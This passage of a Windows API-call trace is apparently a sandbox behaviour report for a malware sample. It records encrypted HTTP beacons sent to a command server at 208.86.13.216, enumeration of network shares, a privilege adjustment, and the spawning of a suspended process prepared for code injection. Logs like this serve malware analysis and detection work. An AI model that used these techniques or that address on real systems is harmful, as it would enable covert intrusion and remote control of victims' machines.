pAddrBuf=0x1ad9308 | out: pAddrBuf=0x1ad9308) returned 1 [0251.588] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0251.589] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0251.589] socket (af=2, type=1, protocol=6) returned 0x464 [0251.590] WSAIoctl (in: s=0x464, dwIoControlCode=0x48000016, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x5a1b48, cbOutBuffer=0x10000, lpcbBytesReturned=0x1c7fd38, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x5a1b48, lpcbBytesReturned=0x1c7fd38, lpOverlapped=0x0) returned 0 [0251.593] closesocket (s=0x464) returned 0 [0251.593] socket (af=2, type=2, protocol=17) returned 0x464 [0251.593] inet_addr (cp="223.255.255.255") returned 0xffffffdf [0251.593] GetBestRoute (in: dwDestAddr=0xffffffdf, dwSourceAddr=0x0, pBestRoute=0x1c7fbe8 | out: pBestRoute=0x1c7fbe8) returned 0x0 [0251.594] GetIpAddrTable (in: pIpAddrTable=0x524240, pdwSize=0x1c7fcec, bOrder=0 | out: pIpAddrTable=0x524240, pdwSize=0x1c7fcec) returned 0x7a [0252.102] GetIpAddrTable (in: pIpAddrTable=0x536140, pdwSize=0x1c7fcec, bOrder=0 | out: pIpAddrTable=0x536140, pdwSize=0x1c7fcec) returned 0x0 [0252.500] setsockopt (s=0x464, level=0, optname=9, optval="\xc0\xa8", optlen=4) returned 0 [0252.500] setsockopt (s=0x464, level=65535, optname=4, optval="\x01", optlen=4) returned 0 [0252.501] setsockopt (s=0x464, level=0, optname=10, optval="\x02", optlen=4) returned 0 [0252.501] bind (s=0x464, addr=0x1c7fc20*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.107"), namelen=16) returned 0 [0252.501] GetLastError () returned 0x0 [0252.501] SetLastError (dwErrCode=0x0) [0252.501] GetLastError () returned 0x0 [0252.501] SetLastError (dwErrCode=0x0) [0252.501] getaddrinfo (in: pNodeName="239.255.255.250", pServiceName="1900", pHints=0x1c7fca4*(ai_flags=0, ai_family=0, ai_socktype=2, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x1c7fcd0 | out: ppResult=0x1c7fcd0*=0x524240*(ai_flags=4, ai_family=2, ai_socktype=2, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x53c830*(sa_family=2, sin_port=0x76c, sin_addr="239.255.255.250"), ai_next=0x0)) returned 0 [0252.501] sendto (in: s=0x464, buf=0x1c7f5e8*, len=137, flags=0, to=0x53c830*(sa_family=2, sin_port=0x76c, sin_addr="239.255.255.250"), tolen=16 | out: buf=0x1c7f5e8*) returned 137 [0252.502] FreeAddrInfoW (pAddrInfo=0x524240*(ai_flags=4, ai_family=2, ai_socktype=2, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x53c830*(sa_family=2, sin_port=0x76c, sin_addr="239.255.255.250"), ai_next=0x0)) [0252.502] select (in: nfds=64, readfds=0x1c7f4b0, writefds=0x0, exceptfds=0x0, timeout=0x1c7f5b8 | out: readfds=0x1c7f4b0, writefds=0x0, exceptfds=0x0) returned 0 [0253.815] GetLastError () returned 0x0 [0253.815] SetLastError (dwErrCode=0x0) [0253.815] GetLastError () returned 0x0 [0253.815] SetLastError (dwErrCode=0x0) [0253.815] getaddrinfo (in: pNodeName="239.255.255.250", pServiceName="1900", pHints=0x1c7fca4*(ai_flags=0, ai_family=0, ai_socktype=2, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x1c7fcd0 | out: ppResult=0x1c7fcd0*=0x5242b8*(ai_flags=4, ai_family=2, ai_socktype=2, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x53c800*(sa_family=2, sin_port=0x76c, sin_addr="239.255.255.250"), ai_next=0x0)) returned 0 [0253.815] sendto (in: s=0x464, buf=0x1c7f5e8*, len=132, flags=0, to=0x53c800*(sa_family=2, sin_port=0x76c, sin_addr="239.255.255.250"), tolen=16 | out: buf=0x1c7f5e8*) returned 132 [0253.815] FreeAddrInfoW (pAddrInfo=0x5242b8*(ai_flags=4, ai_family=2, ai_socktype=2, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x53c800*(sa_family=2, sin_port=0x76c, sin_addr="239.255.255.250"), ai_next=0x0)) [0253.816] select (in: nfds=64, readfds=0x1c7f4b0, writefds=0x0, exceptfds=0x0, timeout=0x1c7f5b8 | out: readfds=0x1c7f4b0, writefds=0x0, exceptfds=0x0) returned 0 [0254.879] GetLastError () returned 0x0 [0254.879] SetLastError (dwErrCode=0x0) [0254.879] GetLastError () returned 0x0 [0254.879] SetLastError (dwErrCode=0x0) [0254.879] getaddrinfo (in: pNodeName="239.255.255.250", pServiceName="1900", pHints=0x1c7fca4*(ai_flags=0, ai_family=0, ai_socktype=2, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x1c7fcd0 | out: ppResult=0x1c7fcd0*=0x5242b8*(ai_flags=4, ai_family=2, ai_socktype=2, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x53c8c0*(sa_family=2, sin_port=0x76c, sin_addr="239.255.255.250"), ai_next=0x0)) returned 0 [0254.879] sendto (in: s=0x464, buf=0x1c7f5e8*, len=133, flags=0, to=0x53c8c0*(sa_family=2, sin_port=0x76c, sin_addr="239.255.255.250"), tolen=16 | out: buf=0x1c7f5e8*) returned 133 [0254.880] FreeAddrInfoW (pAddrInfo=0x5242b8*(ai_flags=4, ai_family=2, ai_socktype=2, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x53c8c0*(sa_family=2, sin_port=0x76c, sin_addr="239.255.255.250"), ai_next=0x0)) [0254.880] select (in: nfds=64, readfds=0x1c7f4b0, writefds=0x0, exceptfds=0x0, timeout=0x1c7f5b8 | out: readfds=0x1c7f4b0, writefds=0x0, exceptfds=0x0) returned 0 [0255.897] GetLastError () returned 0x0 [0255.898] SetLastError (dwErrCode=0x0) [0255.898] GetLastError () returned 0x0 [0255.898] SetLastError (dwErrCode=0x0) [0255.898] getaddrinfo (in: pNodeName="239.255.255.250", pServiceName="1900", pHints=0x1c7fca4*(ai_flags=0, ai_family=0, ai_socktype=2, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x1c7fcd0 | out: ppResult=0x1c7fcd0*=0x5242b8*(ai_flags=4, ai_family=2, ai_socktype=2, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x53c950*(sa_family=2, sin_port=0x76c, sin_addr="239.255.255.250"), ai_next=0x0)) returned 0 [0255.898] sendto (in: s=0x464, buf=0x1c7f5e8*, len=101, flags=0, to=0x53c950*(sa_family=2, sin_port=0x76c, sin_addr="239.255.255.250"), tolen=16 | out: buf=0x1c7f5e8*) returned 101 [0255.898] FreeAddrInfoW (pAddrInfo=0x5242b8*(ai_flags=4, ai_family=2, ai_socktype=2, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x53c950*(sa_family=2, sin_port=0x76c, sin_addr="239.255.255.250"), ai_next=0x0)) [0255.899] select (in: nfds=64, readfds=0x1c7f4b0, writefds=0x0, exceptfds=0x0, timeout=0x1c7f5b8 | out: readfds=0x1c7f4b0, writefds=0x0, exceptfds=0x0) returned 0 [0257.093] closesocket (s=0x464) returned 0 [0257.093] lstrlenA (lpString="LHNIWSJ_D2CA4DEF") returned 16 [0257.097] CryptDuplicateHash (in: hHash=0x5134a8, pdwReserved=0x0, dwFlags=0x0, phHash=0x1c7fc5c | out: phHash=0x1c7fc5c) returned 1 [0257.097] CryptEncrypt (in: hKey=0x513428, hHash=0x58fdc8, Final=1, dwFlags=0x0, pbData=0x53674c*, pdwDataLen=0x1c7fc48*=0x23, dwBufLen=0x30 | out: pbData=0x53674c*, pdwDataLen=0x1c7fc48*=0x30) returned 1 [0257.097] CryptExportKey (in: hKey=0x513428, hExpKey=0x513368, dwBlobType=0x1, dwFlags=0x40, pbData=0x1c7fbbc, pdwDataLen=0x1c7fc28 | out: pbData=0x1c7fbbc*, pdwDataLen=0x1c7fc28*=0x6c) returned 1 [0257.097] CryptGetHashParam (in: hHash=0x58fdc8, dwParam=0x2, pbData=0x536738, pdwDataLen=0x1c7fc44, dwFlags=0x0 | out: pbData=0x536738, pdwDataLen=0x1c7fc44) returned 1 [0257.097] CryptDestroyHash (hHash=0x58fdc8) returned 1 [0257.097] _snwprintf (in: _Dest=0x1c7fc68, _Count=0x40, _Format="%u.%u.%u.%u" | out: _Dest="208.86.13.216") returned 13 [0257.097] GetTickCount () returned 0x14fb1 [0257.097] _snwprintf (in: _Dest=0x51dc48, _Count=0x11c, _Format="Cookie: %u=" | out: _Dest="Cookie: 63812=") returned 14 [0257.097] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0x1c7f81c, cbSize=0x1c7fc1c | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0x1c7fc1c) returned 0x0 [0257.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1c7f81c, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 151 [0257.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1c7f81c, cbMultiByte=-1, lpWideCharStr=0x53bb48, cchWideChar=151 | out: lpWideCharStr="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)") returned 151 [0257.098] InternetOpenW (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0257.098] InternetConnectW (hInternet=0xcc0004, lpszServerName="208.86.13.216", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0257.098] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName=0x0, lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x844cc300, dwContext=0x0) returned 0xcc000c [0257.098] HttpSendRequestW (in: hRequest=0xcc000c, lpszHeaders="Cookie: 63812=CDFkZu/IKoY7DVKrOZxyGgDOUCLo7eSTTM6MP7BmJB+5vvRvMwn1X+/GsAbWTwGFkYOImxtNMhv79Nx0O9b5eJrzbUYb6qn00OFwlaV0jsFopEOUd2l15No/3h9qbDSVjM9RiJVW4KGOiOPDrZeq9ZdpyZvMKpqKnd7FCq/H5euUIiUrYqm1s3FK9oxkRIQULDZd5pbVTPAhZ50n/+WEZpLSpjM=", dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1 [0257.491] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x1c7fc18, lpdwBufferLength=0x1c7fc1c, lpdwIndex=0x0 | out: lpBuffer=0x1c7fc18*, lpdwBufferLength=0x1c7fc1c*=0x4, lpdwIndex=0x0) returned 1 [0257.491] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000005, lpBuffer=0x1c7fc1c, lpdwBufferLength=0x1c7fc18, lpdwIndex=0x0 | out: lpBuffer=0x1c7fc1c*, lpdwBufferLength=0x1c7fc18*=0x4, lpdwIndex=0x0) returned 1 [0257.491] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x53d560, dwNumberOfBytesToRead=0x94, lpdwNumberOfBytesRead=0x1c7fc18 | out: lpBuffer=0x53d560*, lpdwNumberOfBytesRead=0x1c7fc18*=0x94) returned 1 [0257.491] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0257.491] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0257.491] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0257.491] CryptDuplicateHash (in: hHash=0x5134a8, pdwReserved=0x0, dwFlags=0x0, phHash=0x1c7fc50 | out: phHash=0x1c7fc50) returned 1 [0257.491] CryptDecrypt (in: hKey=0x513428, hHash=0x58fc88, Final=1, dwFlags=0x0, pbData=0x524510, pdwDataLen=0x1c7fd0c | out: pbData=0x524510, pdwDataLen=0x1c7fd0c) returned 1 [0257.491] CryptVerifySignatureW (hHash=0x58fc88, pbSignature=0x53d560, dwSigLen=0x60, hPubKey=0x513368, szDescription=0x0, dwFlags=0x0) returned 1 [0257.491] CryptDestroyHash (hHash=0x58fc88) returned 1 [0257.492] CryptDestroyHash (hHash=0x5134a8) returned 1 [0257.492] CryptDestroyKey (hKey=0x513428) returned 1 [0257.492] CryptDestroyKey (hKey=0x513368) returned 1 [0257.492] CryptReleaseContext (hProv=0x5353b0, dwFlags=0x0) returned 1 [0257.492] WSACleanup () returned 0 [0257.492] FreeLibrary (hLibModule=0x760f0000) returned 1 [0257.492] FreeLibrary (hLibModule=0x77130000) returned 1 [0257.492] FreeLibrary (hLibModule=0x74790000) returned 1 [0257.492] FreeLibrary (hLibModule=0x74450000) returned 1 [0257.492] FreeLibrary (hLibModule=0x73f30000) returned 1 [0257.492] FreeLibrary (hLibModule=0x76a40000) returned 1 [0257.492] ReleaseMutex (hMutex=0x40c) returned 1 [0257.492] CloseHandle (hObject=0x40c) returned 1 [0257.492] CloseHandle (hObject=0x408) returned 1 Thread: id = 512 os_tid = 0x7d8 [0249.777] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3c8 [0249.777] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x760f0000 [0249.778] LoadLibraryW (lpLibFileName="mpr.dll") returned 0x73a40000 [0249.778] LoadLibraryW (lpLibFileName="netapi32.dll") returned 0x73a20000 [0250.305] LoadLibraryW (lpLibFileName="SAMCLI.DLL") returned 0x739c0000 [0250.441] LoadLibraryW (lpLibFileName="wtsapi32.dll") returned 0x73f20000 [0250.442] GetComputerNameW (in: lpBuffer=0xb2b604, nSize=0x1dbff54 | out: lpBuffer="LHNIWSJ", nSize=0x1dbff54) returned 1 [0250.451] WTSGetActiveConsoleSessionId () returned 0x1 [0250.451] QueryUserToken () returned 0x0 [0250.452] ImpersonateLoggedOnUser (hToken=0x0) returned 0 [0250.452] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x1dbff40 | out: lphEnum=0x1dbff40*=0x58fd08) returned 0x0 [0251.318] WaitForSingleObject (hHandle=0x3c8, dwMilliseconds=0x0) returned 0x102 [0251.318] WNetEnumResourceW (in: hEnum=0x58fd08, lpcCount=0x1dbff3c, lpBuffer=0x590ea8, lpBufferSize=0x1dbff44 | out: lpcCount=0x1dbff3c, lpBuffer=0x590ea8, lpBufferSize=0x1dbff44) returned 0x0 [0251.318] WaitForSingleObject (hHandle=0x3c8, dwMilliseconds=0x0) returned 0x102 [0251.318] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x590ea8, lphEnum=0x1dbff20 | out: lphEnum=0x1dbff20*=0x526fe0) returned 0x0 [0251.321] WaitForSingleObject (hHandle=0x3c8, dwMilliseconds=0x0) returned 0x102 [0251.321] WNetEnumResourceW (in: hEnum=0x526fe0, lpcCount=0x1dbff1c, lpBuffer=0x5a0eb0, lpBufferSize=0x1dbff24 | out: lpcCount=0x1dbff1c, lpBuffer=0x5a0eb0, lpBufferSize=0x1dbff24) returned 0x103 [0251.322] WNetCloseEnum (hEnum=0x526fe0) returned 0x0 [0251.322] WaitForSingleObject (hHandle=0x3c8, dwMilliseconds=0x0) returned 0x102 [0251.322] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x590ec8, lphEnum=0x1dbff20 | out: lphEnum=0x1dbff20*=0x1dbff48) returned 0x4b8 [0264.266] WaitForSingleObject (hHandle=0x3c8, dwMilliseconds=0x0) returned 0x102 [0264.266] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x590ee8, lphEnum=0x1dbff20 | out: lphEnum=0x1dbff20*=0x1dbff48) returned 0x4c6 [0264.267] WaitForSingleObject (hHandle=0x3c8, dwMilliseconds=0x0) returned 0x102 [0264.267] WNetEnumResourceW (in: hEnum=0x58fd08, lpcCount=0x1dbff3c, lpBuffer=0x590ea8, lpBufferSize=0x1dbff44 | out: lpcCount=0x1dbff3c, lpBuffer=0x590ea8, lpBufferSize=0x1dbff44) returned 0x103 [0264.268] WNetCloseEnum (hEnum=0x58fd08) returned 0x0 [0264.268] CloseHandle (hObject=0x0) returned 0 [0264.277] FreeLibrary (hLibModule=0x760f0000) returned 1 [0264.277] FreeLibrary (hLibModule=0x73a40000) returned 1 [0264.277] FreeLibrary (hLibModule=0x73a20000) returned 1 [0264.277] FreeLibrary (hLibModule=0x73f20000) returned 1 [0264.277] CloseHandle (hObject=0x3c8) returned 1 Thread: id = 513 os_tid = 0x7dc [0250.398] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3ec [0250.398] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x760f0000 [0250.398] LoadLibraryW (lpLibFileName="crypt32.dll") returned 0x77130000 [0250.399] LoadLibraryW (lpLibFileName="shell32.dll") returned 0x74790000 [0250.399] LoadLibraryW (lpLibFileName="urlmon.dll") returned 0x74450000 [0250.399] LoadLibraryW (lpLibFileName="userenv.dll") returned 0x74160000 [0250.400] LoadLibraryW (lpLibFileName="wininet.dll") returned 0x73f30000 [0250.400] LoadLibraryW (lpLibFileName="wtsapi32.dll") returned 0x73f20000 [0250.400] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x1e0cec0 | out: lpBuffer="C:\\Windows\\TEMP\\") returned 0x10 [0250.400] GetTempFileNameW (in: lpPathName="C:\\Windows\\TEMP\\", lpPrefixString=0x0, uUnique=0x0, lpTempFileName=0x1e0cec0 | out: lpTempFileName="C:\\Windows\\TEMP\\3595.tmp" (normalized: "c:\\windows\\temp\\3595.tmp")) returned 0x3595 [0250.401] DeleteFileW (lpFileName="C:\\Windows\\TEMP\\3595.tmp" (normalized: "c:\\windows\\temp\\3595.tmp")) returned 1 [0250.402] CryptAcquireContextW (in: phProv=0x1e0d0f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000040 | out: phProv=0x1e0d0f0*=0x535218) returned 1 [0250.402] CryptDecodeObjectEx (in: dwCertEncodingType=0x10001, lpszStructType=0x13, pbEncoded=0x413430, cbEncoded=0x6a, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x1f4ff14, pcbStructInfo=0x1f4ff10 | out: pvStructInfo=0x1f4ff14, pcbStructInfo=0x1f4ff10) returned 1 [0250.402] CryptImportKey (in: hProv=0x535218, pbData=0x501608, dwDataLen=0x74, hPubKey=0x0, dwFlags=0x0, phKey=0x1e0d0f4 | out: phKey=0x1e0d0f4*=0x513328) returned 1 [0250.402] LocalFree (hMem=0x501608) returned 0x0 [0250.402] CryptGenKey (in: hProv=0x535218, Algid=0x660e, dwFlags=0x1, phKey=0x1e0d0f8 | out: phKey=0x1e0d0f8*=0x513568) returned 1 [0250.403] CryptCreateHash (in: hProv=0x535218, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x1e0d0fc | out: phHash=0x1e0d0fc) returned 1 [0250.403] VirtualAlloc (lpAddress=0x0, dwSize=0x1f000, flAllocationType=0x3000, flProtect=0x40) returned 0x1640000 [0250.404] WTSGetActiveConsoleSessionId () returned 0x1 [0250.404] GetCurrentProcess () returned 0xffffffff [0250.404] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x1f4faa4 | out: TokenHandle=0x1f4faa4*=0x3f0) returned 1 [0250.405] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeTcbPrivilege", lpLuid=0x1f4fa9c | out: lpLuid=0x1f4fa9c*(LowPart=0x7, HighPart=0)) returned 1 [0250.432] AdjustTokenPrivileges (in: TokenHandle=0x3f0, DisableAllPrivileges=0, NewState=0x1f4fa8c*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x7, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x10, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0250.432] GetLastError () returned 0x0 [0250.432] CloseHandle (hObject=0x3f0) returned 1 [0250.432] QueryUserToken () returned 0x0 [0250.433] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1f4fd08, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\indexerneutral.exe" (normalized: "c:\\windows\\syswow64\\indexerneutral.exe")) returned 0x26 [0250.433] _snwprintf (in: _Dest=0x1f4fb00, _Count=0x104, _Format="\"%s\" \"%s\"" | out: _Dest="\"C:\\Windows\\SysWOW64\\indexerneutral.exe\" \"C:\\Windows\\TEMP\\3595.tmp\"") returned 67 [0250.434] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\SysWOW64\\indexerneutral.exe\" \"C:\\Windows\\TEMP\\3595.tmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x404, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1f4fa94*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1f4ff1c | out: lpCommandLine="\"C:\\Windows\\SysWOW64\\indexerneutral.exe\" \"C:\\Windows\\TEMP\\3595.tmp\"", lpProcessInformation=0x1f4ff1c*(hProcess=0x410, hThread=0x3f0, dwProcessId=0x428, dwThreadId=0x450)) returned 1 [0250.441] VirtualQueryEx (in: hProcess=0x410, lpAddress=0x400000, lpBuffer=0x1f4fac0, dwLength=0x1c | out: lpBuffer=0x1f4fac0*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0250.441] VirtualProtectEx (in: hProcess=0x410, lpAddress=0x400000, dwSize=0x1f000, flNewProtect=0x40, lpflOldProtect=0x1f4fadc | out: lpflOldProtect=0x1f4fadc*=0x2) returned 1 [0250.441] GetThreadContext (in: hThread=0x3f0, lpContext=0x1f4f7f4 | out: lpContext=0x1f4f7f4*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x7ffde000, Edx=0x0, Ecx=0x0, Eax=0x401000, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, 